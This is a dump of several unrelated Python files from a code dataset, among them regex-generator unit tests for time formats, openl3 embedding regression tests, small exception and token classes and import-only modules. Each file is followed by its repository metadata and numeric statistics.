        self.assertRaises(ValueError,regexpgen.time, "%H:%M", "01:00", "00:00")
        self.assertRaises(ValueError,regexpgen.time, "%I:%M %P", "01:00 am", "00:00 am")
        self.assertRaises(ValueError,regexpgen.time, "%H:%M", "01:00 pm", "00:00 am")
        self.assertRaises(ValueError,regexpgen.time, "%H:", "01", "00")
        self.assertRaises(ValueError,regexpgen.time, "%H:%M", "01:02", "01:00")
        self.assertRaises(ValueError,regexpgen.time, "%H:%M:%S", "01:00:02", "01:00:00")
    def testForMin(self):
        # Lower bound only (max=None): values below the min must not match.
        regexp = regexpgen.time("%H", "10", None)
        self.assertTrue(re.match(regexp, "10"))
        self.assertTrue(re.match(regexp, "17"))
        self.assertTrue(re.match(regexp, "23"))
        self.assertFalse(re.match(regexp, "00"))
        self.assertFalse(re.match(regexp, "01"))
        self.assertFalse(re.match(regexp, "08"))
        regexp = regexpgen.time("%S", "40", None)
        self.assertTrue(re.match(regexp, "56"))
        self.assertTrue(re.match(regexp, "40"))
        self.assertTrue(re.match(regexp, "59"))
        self.assertFalse(re.match(regexp, "39"))
        self.assertFalse(re.match(regexp, "01"))
        self.assertFalse(re.match(regexp, "08"))
        regexp = regexpgen.time("%H:%M", "12:13", None)
        self.assertTrue(re.match(regexp, "12:56"))
        self.assertTrue(re.match(regexp, "13:40"))
        self.assertTrue(re.match(regexp, "23:59"))
        self.assertFalse(re.match(regexp, "00:39"))
        self.assertFalse(re.match(regexp, "12:01"))
        self.assertFalse(re.match(regexp, "12:12"))
        regexp = regexpgen.time("%I:%M %P", "12:13 PM", None)
        self.assertTrue(re.match(regexp, "12:56 PM"))
        self.assertTrue(re.match(regexp, "12:13 PM"))
        self.assertTrue(re.match(regexp, "04:59 PM"))
        self.assertFalse(re.match(regexp, "00:39 AM"))
        self.assertFalse(re.match(regexp, "12:01 PM"))
        self.assertFalse(re.match(regexp, "12:12 PM"))
    def testForMax(self):
        # Upper bound only (min=None): values above the max must not match.
        regexp = regexpgen.time("%H", None, "10")
        self.assertFalse(re.match(regexp, "11"))
        self.assertFalse(re.match(regexp, "17"))
        self.assertFalse(re.match(regexp, "23"))
        self.assertTrue(re.match(regexp, "00"))
        self.assertTrue(re.match(regexp, "01"))
        self.assertTrue(re.match(regexp, "08"))
        regexp = regexpgen.time("%S", None, "40")
        self.assertFalse(re.match(regexp, "56"))
        self.assertFalse(re.match(regexp, "41"))
        self.assertFalse(re.match(regexp, "59"))
        self.assertTrue(re.match(regexp, "39"))
        self.assertTrue(re.match(regexp, "01"))
        self.assertTrue(re.match(regexp, "08"))
        regexp = regexpgen.time("%H:%M", None, "12:13")
        self.assertFalse(re.match(regexp, "12:56"))
        self.assertFalse(re.match(regexp, "13:40"))
        self.assertFalse(re.match(regexp, "23:59"))
        self.assertTrue(re.match(regexp, "00:39"))
        self.assertTrue(re.match(regexp, "12:01"))
        self.assertTrue(re.match(regexp, "12:12"))
        regexp = regexpgen.time("%I:%M %P", None, "12:13 PM")
        self.assertFalse(re.match(regexp, "12:56 PM"))
        self.assertFalse(re.match(regexp, "01:40 PM"))
        self.assertFalse(re.match(regexp, "10:59 PM"))
        self.assertTrue(re.match(regexp, "00:39 AM"))
        self.assertTrue(re.match(regexp, "12:01 PM"))
        self.assertTrue(re.match(regexp, "12:12 PM"))
    def testForMinMax(self):
        # Both bounds, including 12-hour ranges within and across AM/PM.
        regexp = regexpgen.time("%H", "03", "10")
        self.assertFalse(re.match(regexp, "11"))
        self.assertFalse(re.match(regexp, "17"))
        self.assertFalse(re.match(regexp, "02"))
        self.assertTrue(re.match(regexp, "03"))
        self.assertTrue(re.match(regexp, "05"))
        self.assertTrue(re.match(regexp, "10"))
        self.assertTrue(re.match(regexp, "08"))
        regexp = regexpgen.time("%S", "20", "40")
        self.assertFalse(re.match(regexp, "19"))
        self.assertFalse(re.match(regexp, "59"))
        self.assertFalse(re.match(regexp, "45"))
        self.assertTrue(re.match(regexp, "39"))
        self.assertTrue(re.match(regexp, "20"))
        self.assertTrue(re.match(regexp, "40"))
        regexp = regexpgen.time("%H:%M", "01:22", "12:13")
        self.assertFalse(re.match(regexp, "12:56"))
        self.assertFalse(re.match(regexp, "13:40"))
        self.assertFalse(re.match(regexp, "01:21"))
        self.assertTrue(re.match(regexp, "01:22"))
        self.assertTrue(re.match(regexp, "10:01"))
        self.assertTrue(re.match(regexp, "12:13"))
        regexp = regexpgen.time("%I:%M %P", "12:13 PM", "05:13 PM")
        self.assertFalse(re.match(regexp, "12:12 PM"))
        self.assertFalse(re.match(regexp, "05:14 PM"))
        self.assertFalse(re.match(regexp, "06:59 PM"))
        self.assertFalse(re.match(regexp, "02:12 AM"))
        self.assertTrue(re.match(regexp, "05:13 PM"))
        self.assertTrue(re.match(regexp, "05:12 PM"))
        self.assertTrue(re.match(regexp, "02:12 PM"))
        regexp = regexpgen.time("%I:%M %P", "03:00 AM", "05:13 AM")
        self.assertFalse(re.match(regexp, "12:12 PM"))
        self.assertFalse(re.match(regexp, "05:14 AM"))
        self.assertFalse(re.match(regexp, "06:59 AM"))
        self.assertFalse(re.match(regexp, "02:14 AM"))
        self.assertTrue(re.match(regexp, "05:13 AM"))
        self.assertTrue(re.match(regexp, "05:00 AM"))
        self.assertTrue(re.match(regexp, "04:12 AM"))
        self.assertTrue(re.match(regexp, "03:12 AM"))
        regexp = regexpgen.time("%I:%M %P", "03:00 AM", "05:13 PM")
        self.assertFalse(re.match(regexp, "02:12 AM"))
        self.assertFalse(re.match(regexp, "05:14 PM"))
        self.assertFalse(re.match(regexp, "06:59 PM"))
        self.assertFalse(re.match(regexp, "02:59 AM"))
        self.assertTrue(re.match(regexp, "05:13 AM"))
        self.assertTrue(re.match(regexp, "05:00 PM"))
        self.assertTrue(re.match(regexp, "04:12 AM"))
        self.assertTrue(re.match(regexp, "03:12 AM"))
        self.assertTrue(re.match(regexp, "12:12 PM"))
    def testForDifferentSeparator(self):
        # The literal separator in the format must be matched exactly.
        regexp = regexpgen.time("%H::%M")
        self.assertTrue(re.match(regexp, "01::00"))
        self.assertTrue(re.match(regexp, "00::00"))
        self.assertTrue(re.match(regexp, "00::05"))
        self.assertTrue(re.match(regexp, "23::59"))
        self.assertTrue(re.match(regexp, "17::34"))
        self.assertFalse(re.match(regexp, "01-00"))
        self.assertFalse(re.match(regexp, "00-00"))
        self.assertFalse(re.match(regexp, "00-05"))
        self.assertFalse(re.match(regexp, "23:59"))
        self.assertFalse(re.match(regexp, "17\34"))
        regexp = regexpgen.time("%H %M")
        self.assertTrue(re.match(regexp, "01 00"))
        self.assertTrue(re.match(regexp, "00 00"))
        self.assertTrue(re.match(regexp, "00 05"))
        self.assertTrue(re.match(regexp, "23 59"))
        self.assertTrue(re.match(regexp, "17 34"))
        self.assertFalse(re.match(regexp, "01-00"))
        self.assertFalse(re.match(regexp, "00-00"))
        self.assertFalse(re.match(regexp, "00-05"))
        self.assertFalse(re.match(regexp, "23:59"))
        self.assertFalse(re.match(regexp, "17\34"))
        regexp = regexpgen.time("%H-%M")
        self.assertTrue(re.match(regexp, "01-00"))
        self.assertTrue(re.match(regexp, "00-00"))
        self.assertTrue(re.match(regexp, "00-05"))
        self.assertTrue(re.match(regexp, "23-59"))
        self.assertTrue(re.match(regexp, "17-34"))
        self.assertFalse(re.match(regexp, "01--00"))
        self.assertFalse(re.match(regexp, "00--00"))
        self.assertFalse(re.match(regexp, "00::05"))
        self.assertFalse(re.match(regexp, "23:59"))
        self.assertFalse(re.match(regexp, "17\34"))
# Run the suite directly with `python Time.py`.
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
| 34.003425
| 82
| 0.6761
| 1,496
| 9,929
| 4.481952
| 0.058155
| 0.173304
| 0.321849
| 0.269351
| 0.93393
| 0.904847
| 0.781506
| 0.699776
| 0.633408
| 0.539597
| 0
| 0.07688
| 0.109175
| 9,929
| 291
| 83
| 34.120275
| 0.681176
| 0.01128
| 0
| 0.353488
| 0
| 0
| 0.122948
| 0
| 0
| 0
| 0
| 0
| 0.827907
| 1
| 0.032558
| false
| 0
| 0.018605
| 0
| 0.055814
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad2ab0b2fa7941e2b054610b02f8b81b315ac4f4
| 138
|
py
|
Python
|
src/fecc_tokens/Lte.py
|
castor91/fecc
|
bc46059c0d7a428d15b95050b70dec374b4bea28
|
[
"MIT"
] | 1
|
2018-02-04T14:48:15.000Z
|
2018-02-04T14:48:15.000Z
|
src/fecc_tokens/Lte.py
|
castor91/fecc
|
bc46059c0d7a428d15b95050b70dec374b4bea28
|
[
"MIT"
] | null | null | null |
src/fecc_tokens/Lte.py
|
castor91/fecc
|
bc46059c0d7a428d15b95050b70dec374b4bea28
|
[
"MIT"
] | null | null | null |
from BinOp import BinOp
class Lte(BinOp):
    # "Less than or equal" binary-operator token; all behavior beyond the
    # display string comes from BinOp.
    def __init__(self):
        pass
    def __str__(self):
        # Human-readable token name used when printing.
        return 'LESS THAN EQUAL'
| 13.8
| 32
| 0.615942
| 18
| 138
| 4.277778
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.304348
| 138
| 9
| 33
| 15.333333
| 0.802083
| 0
| 0
| 0
| 0
| 0
| 0.108696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
ad419ae7ec077fff6adab4e62c6c7d47fafd9483
| 42
|
py
|
Python
|
toggl/cli/__init__.py
|
Bass-03/toggl-cli
|
ba1bb0409bdd85dab5cf10fba9fc37b6b533eb38
|
[
"MIT"
] | 178
|
2018-12-03T08:45:43.000Z
|
2022-03-24T21:44:49.000Z
|
toggl/cli/__init__.py
|
Bass-03/toggl-cli
|
ba1bb0409bdd85dab5cf10fba9fc37b6b533eb38
|
[
"MIT"
] | 123
|
2018-02-04T10:03:49.000Z
|
2022-03-30T18:30:31.000Z
|
toggl/cli/__init__.py
|
beauraines/toggl-cli
|
d79af4f48518725a80db1fddf3e5c180aecfdf20
|
[
"MIT"
] | 44
|
2015-02-12T20:30:39.000Z
|
2018-10-29T22:53:12.000Z
|
from toggl.cli.commands import entrypoint
| 21
| 41
| 0.857143
| 6
| 42
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ad873fc55388ec62f6541bad616a8557df7a9e20
| 248
|
py
|
Python
|
mrcnn/utils/exceptions.py
|
darolt/mask_rcnn
|
680e960ddc70ec912c4d7084b7b15c9e3e6632a7
|
[
"MIT"
] | 40
|
2018-09-04T15:06:50.000Z
|
2021-07-17T13:51:26.000Z
|
mrcnn/utils/exceptions.py
|
conanhung/mask_rcnn-1
|
fd594b726a33432d7d8d326bddf35d0093ad90fa
|
[
"MIT"
] | 6
|
2019-06-06T14:38:48.000Z
|
2021-07-29T14:46:47.000Z
|
mrcnn/utils/exceptions.py
|
conanhung/mask_rcnn-1
|
fd594b726a33432d7d8d326bddf35d0093ad90fa
|
[
"MIT"
] | 9
|
2019-04-03T15:55:15.000Z
|
2020-05-20T10:24:33.000Z
|
class NoBoxHasPositiveArea(Exception):
    """Raised when no candidate bounding box has a positive area."""

    def __init__(self):
        # super() is the idiomatic replacement for Exception.__init__(self, ...).
        super().__init__('No box has positive area.')
class NoBoxToKeep(Exception):
    """Raised when detection filtering leaves no box to keep."""

    def __init__(self):
        # super() is the idiomatic replacement for Exception.__init__(self, ...).
        super().__init__('No box to keep in detection.')
| 22.545455
| 64
| 0.697581
| 29
| 248
| 5.413793
| 0.551724
| 0.203822
| 0.203822
| 0.254777
| 0.535032
| 0.535032
| 0.535032
| 0.535032
| 0.535032
| 0
| 0
| 0
| 0.197581
| 248
| 10
| 65
| 24.8
| 0.788945
| 0
| 0
| 0.333333
| 0
| 0
| 0.215447
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
d1111e71a19bca539ae9f59d14121903ebc7fa6c
| 224
|
py
|
Python
|
polyaxon_cli/client/tracking.py
|
DXist/polyaxon-cli
|
0b01512548f9faea77fb60cb7c6bd327e0638b13
|
[
"MIT"
] | null | null | null |
polyaxon_cli/client/tracking.py
|
DXist/polyaxon-cli
|
0b01512548f9faea77fb60cb7c6bd327e0638b13
|
[
"MIT"
] | null | null | null |
polyaxon_cli/client/tracking.py
|
DXist/polyaxon-cli
|
0b01512548f9faea77fb60cb7c6bd327e0638b13
|
[
"MIT"
] | null | null | null |
from polyaxon_client.settings import POLYAXON_NO_OP_KEY, TMP_POLYAXON_PATH # noqa
from polyaxon_client.tracking import BuildJob, Experiment, Job # noqa
from polyaxon_client.tracking.utils.hashing import hash_value # noqa
| 56
| 82
| 0.84375
| 32
| 224
| 5.625
| 0.59375
| 0.2
| 0.3
| 0.244444
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 224
| 3
| 83
| 74.666667
| 0.9
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d1398e75e4b0388cf9a590de67255c23f699ac06
| 65
|
py
|
Python
|
src/core/visitors/__init__.py
|
2kodevs/cool-compiler-2020
|
7b4e36706562d616c6bf900049edf52281ac2e2b
|
[
"MIT"
] | 3
|
2020-02-11T23:45:43.000Z
|
2021-09-03T15:18:06.000Z
|
src/core/visitors/__init__.py
|
2kodevs/cool-compiler-2020
|
7b4e36706562d616c6bf900049edf52281ac2e2b
|
[
"MIT"
] | null | null | null |
src/core/visitors/__init__.py
|
2kodevs/cool-compiler-2020
|
7b4e36706562d616c6bf900049edf52281ac2e2b
|
[
"MIT"
] | 3
|
2022-02-23T21:41:26.000Z
|
2022-02-26T20:53:27.000Z
|
from .cil import *
from .mips import *
from .type_check import *
| 16.25
| 25
| 0.723077
| 10
| 65
| 4.6
| 0.6
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184615
| 65
| 3
| 26
| 21.666667
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d164b60288eb7dcff28d06e2896004a7f1a54e67
| 69
|
py
|
Python
|
tests/unit/test_client.py
|
msmith491/therapyst
|
16561f9bcb005605875910f6d1d39e638de2dc19
|
[
"MIT"
] | null | null | null |
tests/unit/test_client.py
|
msmith491/therapyst
|
16561f9bcb005605875910f6d1d39e638de2dc19
|
[
"MIT"
] | null | null | null |
tests/unit/test_client.py
|
msmith491/therapyst
|
16561f9bcb005605875910f6d1d39e638de2dc19
|
[
"MIT"
] | null | null | null |
import pytest
print("Why aren't there any unit tests yet dummy :P")
| 17.25
| 53
| 0.73913
| 13
| 69
| 3.923077
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 69
| 3
| 54
| 23
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0.637681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
d16d1c35579d1f76aaada2ece3a6febfd2cd0de7
| 8,318
|
py
|
Python
|
tests/test_regression.py
|
lclichen/openl3
|
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
|
[
"MIT"
] | 279
|
2018-11-14T21:37:16.000Z
|
2022-03-25T09:18:32.000Z
|
tests/test_regression.py
|
lclichen/openl3
|
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
|
[
"MIT"
] | 76
|
2018-10-31T18:13:11.000Z
|
2022-02-09T22:44:41.000Z
|
tests/test_regression.py
|
lclichen/openl3
|
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
|
[
"MIT"
] | 45
|
2018-11-14T21:44:21.000Z
|
2022-03-29T09:38:30.000Z
|
import os
from openl3.cli import run
import tempfile
import numpy as np
import shutil
import pytest
TEST_DIR = os.path.dirname(__file__)
TEST_AUDIO_DIR = os.path.join(TEST_DIR, 'data', 'audio')
TEST_IMAGE_DIR = os.path.join(TEST_DIR, 'data', 'image')
TEST_VIDEO_DIR = os.path.join(TEST_DIR, 'data', 'video')
# Test audio file paths
CHIRP_MONO_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_mono.wav')
CHIRP_STEREO_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_stereo.wav')
CHIRP_44K_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_44k.wav')
CHIRP_1S_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_1s.wav')
EMPTY_PATH = os.path.join(TEST_AUDIO_DIR, 'empty.wav')
SHORT_PATH = os.path.join(TEST_AUDIO_DIR, 'short.wav')
SILENCE_PATH = os.path.join(TEST_AUDIO_DIR, 'silence.wav')
# Test image file paths
DAISY_PATH = os.path.join(TEST_IMAGE_DIR, 'daisy.jpg')
BLANK_PATH = os.path.join(TEST_IMAGE_DIR, 'blank.png')
SMALL_PATH = os.path.join(TEST_IMAGE_DIR, 'smol.png')
# Test video file paths
BENTO_PATH = os.path.join(TEST_VIDEO_DIR, 'bento.mp4')
# Regression file paths
TEST_REG_DIR = os.path.join(TEST_DIR, 'data', 'regression')
REG_CHIRP_44K_PATH = os.path.join(TEST_REG_DIR, 'chirp_44k_{}.npz')
REG_CHIRP_44K_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'chirp_44k_{}_linear.npz')
REG_DAISY_PATH = os.path.join(TEST_REG_DIR, 'daisy.npz')
REG_DAISY_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'daisy_linear.npz')
REG_BENTO_AUDIO_PATH = os.path.join(TEST_REG_DIR, 'bento_audio_{}.npz')
REG_BENTO_AUDIO_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'bento_audio_{}_linear.npz')
REG_BENTO_IMAGE_PATH = os.path.join(TEST_REG_DIR, 'bento_image_{}.npz')
REG_BENTO_IMAGE_LINEAR_PATH = os.path.join(TEST_REG_DIR, 'bento_image_{}_linear.npz')
@pytest.mark.parametrize("frontend", ['kapre', 'librosa'])
def test_audio_regression(capsys, frontend):
# test correct execution on test audio file (regression)
tempdir = tempfile.mkdtemp()
run('audio', CHIRP_44K_PATH, output_dir=tempdir, audio_frontend=frontend, verbose=True)
# check output file created
audio_outfile = os.path.join(tempdir, 'chirp_44k.npz')
assert os.path.isfile(audio_outfile)
# regression test
audio_data_reg = np.load(REG_CHIRP_44K_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# SECOND regression test
run('audio', CHIRP_44K_PATH, output_dir=tempdir, suffix='linear', input_repr='linear',
content_type='env', audio_embedding_size=512, audio_center=False, audio_hop_size=0.5,
audio_frontend=frontend, verbose=False)
# check output file created
audio_outfile = os.path.join(tempdir, 'chirp_44k_linear.npz')
assert os.path.isfile(audio_outfile)
# regression test
audio_data_reg = np.load(REG_CHIRP_44K_LINEAR_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# delete output file and temp folder
shutil.rmtree(tempdir)
def test_image_regression(capsys):
# test correct execution on test image file (regression)
tempdir = tempfile.mkdtemp()
run('image', DAISY_PATH, output_dir=tempdir, verbose=True)
# check output file created
image_outfile = os.path.join(tempdir, 'daisy.npz')
assert os.path.isfile(image_outfile)
# regression test
image_data_reg = np.load(REG_DAISY_PATH)
image_data_out = np.load(image_outfile)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == ['embedding']
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# SECOND regression test
run('image', DAISY_PATH, output_dir=tempdir, suffix='linear', input_repr='linear',
content_type='env', image_embedding_size=512, verbose=False)
# check output file created
image_outfile = os.path.join(tempdir, 'daisy_linear.npz')
assert os.path.isfile(image_outfile)
# regression test
image_data_reg = np.load(REG_DAISY_LINEAR_PATH)
image_data_out = np.load(image_outfile)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == ['embedding']
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# delete output file and temp folder
shutil.rmtree(tempdir)
@pytest.mark.parametrize("frontend", ['kapre', 'librosa'])
def test_video_regression(capsys, frontend):
tempdir = tempfile.mkdtemp()
## Video processing regression tests
run('video', BENTO_PATH, output_dir=tempdir, audio_frontend=frontend, verbose=True)
# check output files created
audio_outfile = os.path.join(tempdir, 'bento_audio.npz')
assert os.path.isfile(audio_outfile)
image_outfile = os.path.join(tempdir, 'bento_image.npz')
assert os.path.isfile(image_outfile)
# regression test
audio_data_reg = np.load(REG_BENTO_AUDIO_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
image_data_reg = np.load(REG_BENTO_IMAGE_PATH.format(frontend))
image_data_out = np.load(image_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(image_data_out['timestamps'], image_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
# SECOND regression test
run('video', BENTO_PATH, output_dir=tempdir, suffix='linear', input_repr='linear',
content_type='env', audio_embedding_size=512, image_embedding_size=512,
audio_center=False, audio_hop_size=0.5, audio_frontend=frontend, verbose=False)
# check output files created
audio_outfile = os.path.join(tempdir, 'bento_audio_linear.npz')
assert os.path.isfile(audio_outfile)
image_outfile = os.path.join(tempdir, 'bento_image_linear.npz')
assert os.path.isfile(image_outfile)
# regression test
audio_data_reg = np.load(REG_BENTO_AUDIO_LINEAR_PATH.format(frontend))
audio_data_out = np.load(audio_outfile)
image_data_reg = np.load(REG_BENTO_IMAGE_LINEAR_PATH.format(frontend))
image_data_out = np.load(image_outfile)
assert sorted(audio_data_out.files) == sorted(audio_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(audio_data_out['timestamps'], audio_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(audio_data_out['embedding'], audio_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert sorted(image_data_out.files) == sorted(image_data_reg.files) == sorted(
['embedding', 'timestamps'])
assert np.allclose(image_data_out['timestamps'], image_data_reg['timestamps'],
rtol=1e-05, atol=1e-05, equal_nan=False)
assert np.allclose(image_data_out['embedding'], image_data_reg['embedding'],
rtol=1e-05, atol=1e-05, equal_nan=False)
| 45.955801
| 93
| 0.715436
| 1,201
| 8,318
| 4.660283
| 0.082431
| 0.04288
| 0.055387
| 0.057531
| 0.882437
| 0.862248
| 0.843488
| 0.783813
| 0.724674
| 0.686797
| 0
| 0.018296
| 0.158932
| 8,318
| 180
| 94
| 46.211111
| 0.781732
| 0.075018
| 0
| 0.52
| 0
| 0
| 0.124299
| 0.01526
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.024
| false
| 0
| 0.048
| 0
| 0.072
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
66fe92a1d1f5e359cd6e6ef323efaed12bd191de
| 110
|
py
|
Python
|
python/testData/refactoring/move/cleanupImportsAfterMove/after/src/use2.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/move/cleanupImportsAfterMove/after/src/use2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/move/cleanupImportsAfterMove/after/src/use2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from main import *
from lib import B
from lib import A, C
from other import C1, C2
print(C1, C2, C3, A, B, C)
| 18.333333
| 26
| 0.690909
| 24
| 110
| 3.166667
| 0.5
| 0.184211
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05814
| 0.218182
| 110
| 6
| 26
| 18.333333
| 0.825581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f15154cc15cc8f212ad06b92d9640fd698903b0
| 28
|
py
|
Python
|
xcparse/Helpers/pbPlist/__init__.py
|
samdmarshall/xcparser
|
4f78af149127325e60e3785b6e09d6dbfeedc799
|
[
"BSD-3-Clause"
] | 59
|
2015-02-27T21:45:37.000Z
|
2021-03-16T04:37:40.000Z
|
xcparse/Helpers/pbPlist/__init__.py
|
samdmarshall/xcparser
|
4f78af149127325e60e3785b6e09d6dbfeedc799
|
[
"BSD-3-Clause"
] | 14
|
2015-03-02T18:53:51.000Z
|
2016-07-19T23:20:23.000Z
|
xcparse/Helpers/pbPlist/__init__.py
|
samdmarshall/xcparser
|
4f78af149127325e60e3785b6e09d6dbfeedc799
|
[
"BSD-3-Clause"
] | 8
|
2015-03-02T02:32:09.000Z
|
2017-07-31T21:14:51.000Z
|
from pbPlist import PBPlist
| 14
| 27
| 0.857143
| 4
| 28
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
